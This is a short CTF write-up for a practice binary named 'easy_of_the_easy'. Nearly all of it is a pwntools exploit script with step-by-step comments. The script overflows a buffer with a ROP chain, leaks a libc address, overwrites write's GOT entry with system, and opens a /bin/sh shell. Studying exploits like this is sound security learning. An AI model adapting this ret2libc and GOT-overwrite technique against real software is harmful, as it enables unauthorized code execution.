h3x0r easy_of_the_easy write-up
2018. 11. 7. 22:03ㆍCTF's Write-up
This was a good challenge to work through when you're a little bored.
```python
from pwn import *

r = process("./easy_of_the_easy")
e = ELF("./easy_of_the_easy")
l = e.libc

bss = e.bss() + 0x16           # writable scratch area for the "/bin/sh" string
write_got = e.got["write"]
read_got = e.got["read"]
read_plt = e.plt["read"]
write_plt = e.plt["write"]
shell = b"/bin/sh\x00"
pppr = 0x080489e9              # pop; pop; pop; ret gadget (clears three call arguments)
context.log_level = "debug"


def sendshell():
    # Consumed by the first read() in the chain: stores "/bin/sh" at bss
    r.send(shell)
    log.info("send shell")
    sleep(0.1)


def leak():
    # The chain's write(1, write_got, 8) prints the resolved address of write
    leakadd = u32(r.recv(4))
    log.info(hex(leakadd))
    baseadd = leakadd - l.sym['write']
    log.info(hex(baseadd))
    systemadd = baseadd + l.sym['system']
    log.info(hex(systemadd))
    sleep(0.1)
    # Consumed by the second read(): overwrites write's GOT entry with system
    r.send(p32(systemadd))
    sleep(0.1)


def hidden():
    # Menu input sequence that reaches the hidden, overflowable input
    r.sendline(b"4 245687 1")
    r.sendline(b"0")
    r.sendline(b"4")
    r.sendline(b"1")
    r.sendline(b"1")
    print(r.recv())
    sleep(0.1)


def sendpayload():
    payload = b""
    payload += b"A" * 22                                                       # padding up to the return address
    payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(8)          # read(0, bss, 8)
    payload += p32(write_plt) + p32(pppr) + p32(1) + p32(write_got) + p32(8)   # write(1, write_got, 8)
    payload += p32(read_plt) + p32(pppr) + p32(0) + p32(write_got) + p32(8)    # read(0, write_got, 8)
    payload += p32(write_plt) + b"AAAA" + p32(bss)                             # write@plt now resolves to system(bss)
    r.send(payload)
    log.info("send payload")
    sleep(0.1)


for i in range(0, 10):
    r.sendline(b"1 1 0")
    r.sendline(b"2 2 1")
    r.sendline(b"3 1 1")
    r.sendline(b"4 1 1")
    r.recv()
    sleep(0.1)

hidden()
sendpayload()
sendshell()
leak()
r.interactive()
```